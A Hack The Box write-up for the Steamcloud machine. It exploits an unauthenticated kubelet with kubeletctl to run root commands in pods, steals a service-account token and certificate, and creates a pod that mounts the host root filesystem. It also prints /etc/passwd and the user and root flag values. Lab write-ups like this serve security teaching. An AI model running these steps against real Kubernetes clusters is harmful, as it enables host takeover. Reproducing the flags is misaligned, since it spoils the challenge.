Steamcloud Writeup Hackthebox

### Enumeration Starting off with a nmap scan: ``` Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-16 17:55 EAT Stats: 0:03:19 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 100.00% done; ETC: 17:58 (0:00:00 remaining) Nmap scan report for 10.10.11.133 Host is up (0.23s latency). Not shown: 978 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 21/tcp filtered ftp 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 fc:fb:90:ee:7c:73:a1:d4:bf:87:f8:71:e8:44:c6:3c (RSA) | 256 46:83:2b:1b:01:db:71:64:6a:3e:27:cb:53:6f:81:a1 (ECDSA) |_ 256 1d:8d:d3:41:f3:ff:a4:37:e8:ac:78:08:89:c2:e3:c5 (ED25519) 25/tcp filtered smtp 110/tcp filtered pop3 113/tcp filtered ident 135/tcp filtered msrpc 139/tcp filtered netbios-ssn 256/tcp filtered fw1-secureremote 443/tcp filtered https 445/tcp filtered microsoft-ds 554/tcp filtered rtsp 587/tcp filtered submission 995/tcp filtered pop3s 1025/tcp filtered NFS-or-IIS 1720/tcp filtered h323q931 1723/tcp filtered pptp 2042/tcp filtered isis 2869/tcp filtered icslap 3001/tcp filtered nessus 3306/tcp filtered mysql 3389/tcp filtered ms-wbt-server 8443/tcp open ssl/https-alt | tls-alpn: | h2 |_ http/1.1 | fingerprint-strings: | FourOhFourRequest: | HTTP/1.0 403 Forbidden | Audit-Id: 5d6eacd0-54ad-4080-8f1f-395d6aef4b44 | Cache-Control: no-cache, private | Content-Type: application/json | X-Content-Type-Options: nosniff | X-Kubernetes-Pf-Flowschema-Uid: 42e4e9fa-d40b-4903-a4d2-e1bb7a5d53b8 | X-Kubernetes-Pf-Prioritylevel-Uid: 990c5c05-a579-40b2-b471-4057191fafec | Date: Wed, 16 Feb 2022 15:00:41 GMT | Content-Length: 212 | {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot get path "/nice ports,/Trinity.txt.bak"","reason":"Forbidden","details":{},"code":403} | GetRequest: | HTTP/1.0 403 Forbidden | Audit-Id: 3bb3108d-9c18-4648-b946-d2b9627e7d7f | Cache-Control: no-cache, private | Content-Type: application/json | X-Content-Type-Options: nosniff | X-Kubernetes-Pf-Flowschema-Uid: 42e4e9fa-d40b-4903-a4d2-e1bb7a5d53b8 | X-Kubernetes-Pf-Prioritylevel-Uid: 990c5c05-a579-40b2-b471-4057191fafec | Date: Wed, 16 Feb 2022 15:00:39 GMT | Content-Length: 185 | {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot get path "/"","reason":"Forbidden","details":{},"code":403} | HTTPOptions: | HTTP/1.0 403 Forbidden | Audit-Id: 95c89c5c-b2ef-4197-8741-5d5eab22fb65 | Cache-Control: no-cache, private | Content-Type: application/json | X-Content-Type-Options: nosniff | X-Kubernetes-Pf-Flowschema-Uid: 42e4e9fa-d40b-4903-a4d2-e1bb7a5d53b8 | X-Kubernetes-Pf-Prioritylevel-Uid: 990c5c05-a579-40b2-b471-4057191fafec | Date: Wed, 16 Feb 2022 15:00:40 GMT | Content-Length: 189 |_ {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot options path "/"","reason":"Forbidden","details":{},"code":403} |_ssl-date: TLS randomness does not represent time | ssl-cert: Subject: commonName=minikube/organizationName=system:masters | Subject Alternative Name: DNS:minikubeCA, DNS:control-plane.minikube.internal, DNS:kubernetes.default.svc.cluster.local, DNS:kubernetes.default.svc, DNS:kubernetes.default, DNS:kubernetes, DNS:localhost, IP Address:10.10.11.133, IP Address:10.96.0.1, IP Address:127.0.0.1, IP Address:10.0.0.1 | Not valid before: 2022-02-15T14:59:41 |_Not valid after: 2025-02-15T14:59:41 |_http-title: Site doesn't have a title (application/json). 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port8443-TCP:V=7.92%T=SSL%I=7%D=2/16%Time=620D10AB%P=x86_64-pc-linux-gn SF:u%r(GetRequest,22F,"HTTP/1\.0\x20403\x20Forbidden\r\nAudit-Id:\x203bb31 SF:08d-9c18-4648-b946-d2b9627e7d7f\r\nCache-Control:\x20no-cache,\x20priva SF:te\r\nContent-Type:\x20application/json\r\nX-Content-Type-Options:\x20n SF:osniff\r\nX-Kubernetes-Pf-Flowschema-Uid:\x2042e4e9fa-d40b-4903-a4d2-e1 SF:bb7a5d53b8\r\nX-Kubernetes-Pf-Prioritylevel-Uid:\x20990c5c05-a579-40b2- SF:b471-4057191fafec\r\nDate:\x20Wed,\x2016\x20Feb\x202022\x2015:00:39\x20 SF:GMT\r\nContent-Length:\x20185\r\n\r\n{\"kind\":\"Status\",\"apiVersion\ SF:":\"v1\",\"metadata\":{},\"status\":\"Failure\",\"message\":\"forbidden SF::\x20User\x20\\\"system:anonymous\\\"\x20cannot\x20get\x20path\x20\\\"/ SF:\\\"\",\"reason\":\"Forbidden\",\"details\":{},\"code\":403}\n")%r(HTTP SF:Options,233,"HTTP/1\.0\x20403\x20Forbidden\r\nAudit-Id:\x2095c89c5c-b2e SF:f-4197-8741-5d5eab22fb65\r\nCache-Control:\x20no-cache,\x20private\r\nC SF:ontent-Type:\x20application/json\r\nX-Content-Type-Options:\x20nosniff\ SF:r\nX-Kubernetes-Pf-Flowschema-Uid:\x2042e4e9fa-d40b-4903-a4d2-e1bb7a5d5 SF:3b8\r\nX-Kubernetes-Pf-Prioritylevel-Uid:\x20990c5c05-a579-40b2-b471-40 SF:57191fafec\r\nDate:\x20Wed,\x2016\x20Feb\x202022\x2015:00:40\x20GMT\r\n SF:Content-Length:\x20189\r\n\r\n{\"kind\":\"Status\",\"apiVersion\":\"v1\ SF:",\"metadata\":{},\"status\":\"Failure\",\"message\":\"forbidden:\x20Us SF:er\x20\\\"system:anonymous\\\"\x20cannot\x20options\x20path\x20\\\"/\\\ SF:"\",\"reason\":\"Forbidden\",\"details\":{},\"code\":403}\n")%r(FourOhF SF:ourRequest,24A,"HTTP/1\.0\x20403\x20Forbidden\r\nAudit-Id:\x205d6eacd0- SF:54ad-4080-8f1f-395d6aef4b44\r\nCache-Control:\x20no-cache,\x20private\r SF:\nContent-Type:\x20application/json\r\nX-Content-Type-Options:\x20nosni SF:ff\r\nX-Kubernetes-Pf-Flowschema-Uid:\x2042e4e9fa-d40b-4903-a4d2-e1bb7a SF:5d53b8\r\nX-Kubernetes-Pf-Prioritylevel-Uid:\x20990c5c05-a579-40b2-b471 SF:-4057191fafec\r\nDate:\x20Wed,\x2016\x20Feb\x202022\x2015:00:41\x20GMT\ SF:r\nContent-Length:\x20212\r\n\r\n{\"kind\":\"Status\",\"apiVersion\":\" SF:v1\",\"metadata\":{},\"status\":\"Failure\",\"message\":\"forbidden:\x2 SF:0User\x20\\\"system:anonymous\\\"\x20cannot\x20get\x20path\x20\\\"/nice SF:\x20ports,/Trinity\.txt\.bak\\\"\",\"reason\":\"Forbidden\",\"details\" SF::{},\"code\":403}\n"); Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 210.14 seconds ``` got two ports open , that is port 22 and 8443, and we can see some very interesting information also given from the nmap report: ``` | Subject Alternative Name: DNS:minikubeCA, DNS:control-plane.minikube.internal, DNS:kubernetes.default.svc.cluster.local, DNS:kubernetes.default.svc, DNS:kubernetes.default, DNS:kubernetes, DNS:localhost, IP Address:10.10.11.133, IP Address:10.96.0.1, IP Address:127.0.0.1, IP Address:10.0.0.1 ``` Opening the port 8443 on web it gave me this response: ![](https://i.imgur.com/ZJXiKCj.png) Changing from `http://ip:8443/` to `https://ip:8443/` gave another type of response: ![](https://i.imgur.com/cnM6jeB.png) So I now decide to go ahead with this using python, tho we an easily use curl `req.py` ```python= #!/usr/bin/python3 #author : @tahaafarooq#9056 import requests #import json host = "https://10.10.11.133:8443/" headers = {'Content-Type':'application/json'} req = requests.get(host,verify=False) res = req.text print(res) ``` `response` ``` [tahaafarooq@urchinsec-lab steamcloud]$ python3 req.py /usr/lib/python3.10/site-packages/urllib3/connectionpool.py:1013: InsecureRequestWarning: Unverified HTTPS request is being made to host '10.10.11.133'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings warnings.warn( {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User \"system:anonymous\" cannot get path \"/\"","reason":"Forbidden","details":{},"code":403} ``` To get an even clear output of the json, I used `jq`: ``` [tahaafarooq@urchinsec-lab steamcloud]$ python3 req.py | jq /usr/lib/python3.10/site-packages/urllib3/connectionpool.py:1013: InsecureRequestWarning: Unverified HTTPS request is being made to host '10.10.11.133'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings warnings.warn( { "kind": "Status", "apiVersion": "v1", "metadata": {}, "status": "Failure", "message": "forbidden: User \"system:anonymous\" cannot get path \"/\"", "reason": "Forbidden", "details": {}, "code": 403 } ``` We can see that it's an error message that says user anonymous is forbidden to access the path `/`, which means we first have to authenticate. Now on a quick nmap scan , I was able to see multiple ports show up not actually a quick scan but on a scan range of all ports using `-p-` flag: ``` PORT STATE SERVICE 22/tcp open ssh 2379/tcp open etcd-client 2380/tcp open etcd-server 8443/tcp open https-alt 10250/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 2.32 seconds ``` We have etcd which is a kubernetes component , it is listening on port 2379 as client and on port 2380 as server, kubelet is a kubernet extension , which I came to know after searching up the port 10250 on google, and the port 8443 is actually a kubernetes API Now this makes clear sense! opening up port 10250 using my simple script, it gave me `404 page not found`: ``` [tahaafarooq@urchinsec-lab steamcloud]$ python3 req.py Enter host url (https://) : https://10.10.11.133:10250/ /usr/lib/python3.10/site-packages/urllib3/connectionpool.py:1013: InsecureRequestWarning: Unverified HTTPS request is being made to host '10.10.11.133'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings warnings.warn( 404 page not found ``` I proceeded to doing `dirbusting`: ``` [tahaafarooq@urchinsec-lab steamcloud]$ sudo dirsearch -u https://10.10.11.133:10250/ -e* [sudo] password for tahaafarooq: _|. _ _ _ _ _ _|_ v0.4.2 (_||| _) (/_(_|| (_| ) Extensions: * | HTTP method: GET | Threads: 30 | Wordlist size: 9073 Output File: /usr/lib/python3.10/site-packages/dirsearch-0.4.2-py3.10.egg/dirsearch/reports/10.10.11.133-10250/-_22-02-16_18-24-31.txt Log File: /usr/lib/python3.10/site-packages/dirsearch-0.4.2-py3.10.egg/dirsearch/logs/22-02-16_18-24-31.log Target: https://10.10.11.133:10250/ [18:24:32] Starting: [18:24:34] 301 - 46B - /%2e%2e//google.com -> /google.com [18:24:34] 301 - 46B - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd -> /etc/passwd [18:25:29] 301 - 46B - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd -> /etc/passwd [18:25:30] 301 - 87B - /Citrix//AccessPlatform/auth/clientscripts/cookies.js -> /Citrix/AccessPlatform/auth/clientscripts/cookies.js [18:25:39] 301 - 48B - /debug/pprof -> /debug/pprof/ [18:25:39] 200 - 69KB - /debug/pprof/goroutine?debug=1 [18:25:43] 301 - 74B - /engine/classes/swfupload//swfupload.swf -> /engine/classes/swfupload/swfupload.swf [18:25:44] 301 - 77B - /engine/classes/swfupload//swfupload_f9.swf -> /engine/classes/swfupload/swfupload_f9.swf [18:25:45] 301 - 62B - /extjs/resources//charts.swf -> /extjs/resources/charts.swf [18:25:52] 301 - 72B - /html/js/misc/swfupload//swfupload.swf -> /html/js/misc/swfupload/swfupload.swf [18:26:02] 301 - 41B - /logs -> /logs/ [18:26:03] 200 - 2KB - /logs/ [18:26:11] 200 - 179KB - /metrics ``` and I found that interesting folder `logs` I accessed it on the web, and there are alot of folders and log files which are very interesting. ![](https://i.imgur.com/oAtkeph.png) And among them was `/logs/pods/` this means I can basically extract all the pods. ![](https://i.imgur.com/PpiFXgz.png) And there we have it all the pods from kubernetes cluster ### Initial Access & Foothold The api running on the port 8443 , is actually undocumented meaning that we dont know what requests and how the data is arranged and what parameteres are set with what values to be sent. But fortunately we can still use `kubectl` to interface with it and get inside the pod. ![](https://i.imgur.com/NX0j9Tr.png) and with the command `kubeletctl --server ip pods` we can see the pods available, so now for the foothold part, I scan for rce with the command `kubeletctl --server ip scan rce` which will allow me to know if I can run commands on available pods ![](https://i.imgur.com/vROz2Cv.png) We can see that , we can actually run commands on the `nginx` pod and the `kube-proxy-j487c` pod ``` [tahaafarooq@urchinsec-lab steamcloud]$ kubeletctl --server 10.10.11.133 exec "id" -p nginx -c nginx uid=0(root) gid=0(root) groups=0(root) ``` ### Privilege Escalation Now that we have possible RCE, but on a pod, my next approach is to get access to the token needed for authentication and the certificates ,which will allow me to create a service account with higher privileges. ![](https://i.imgur.com/qnyXvIP.png) alright we have the certificate and the token, we can just log in to kubectl ``` [tahaafarooq@urchinsec-lab steamcloud]$ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 get pods NAME READY STATUS RESTARTS AGE nginx 1/1 Running 0 68m ``` I now list privs that I have on the default service account: ![](https://i.imgur.com/0zcmhmB.png) Okayy, it seems that I can create a pod in the default namespace as well as get a pod and just list them as did before. My approach right now is to create a pod , where I shall have to use the nginx image, I wrote my basic simple configuration file: ```yaml= apiVersion: v1 kind: Pod metadata: name: sample namespace: default spec: containers: - name: sample image: nginx:1.14.2 volumeMounts: - mountPath: /root name: rooty volumes: - name: rooty hostPath: path: / automountServiceAccountToken: true hostNetwork: true ``` That I shall use to create the pod: ``` [tahaafarooq@urchinsec-lab steamcloud]$ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 apply -f sus.yaml pod/sample created ``` ``` [tahaafarooq@urchinsec-lab steamcloud]$ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 get pods NAME READY STATUS RESTARTS AGE nginx 1/1 Running 0 81m sample 1/1 Running 0 18s ``` and we can see that it's already up and running! ``` [tahaafarooq@urchinsec-lab steamcloud]$ kubeletctl --server 10.10.11.133 exec "id" -p sample -c sample uid=0(root) gid=0(root) groups=0(root) ``` I try getting the root flag : ``` [tahaafarooq@urchinsec-lab steamcloud]$ kubeletctl --server 10.10.11.133 exec "cat /root/root.txt" -p sample -c sample cat: /root/root.txt: No such file or directory command terminated with exit code 1 ``` So I now take a look at `/etc/passwd` ``` [tahaafarooq@urchinsec-lab steamcloud]$ kubeletctl --server 10.10.11.133 exec "cat /etc/passwd" -p sample -c sample root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/bin/false nginx:x:101:101:nginx user,,,:/nonexistent:/bin/false ``` I couldn't see a user with `/home/` , so I'm assuming both users are in `/root/` **USER FLAG** ``` [tahaafarooq@urchinsec-lab steamcloud]$ kubeletctl --server 10.10.11.133 exec "cat /root/home/user/user.txt" -p sample -c sample c65246eb8f02a2366f02877d567c1265 ``` **ROOT FLAG** ``` [tahaafarooq@urchinsec-lab steamcloud]$ kubeletctl --server 10.10.11.133 exec "cat /root/root/root.txt" -p sample -c sample 3370f968dc760bd1ca95dd701be8b520 ``` contacts : [tahaafarooq](https://twitter.com/tahaafarooq) --- ![](https://i.imgur.com/kOD5xfq.gif)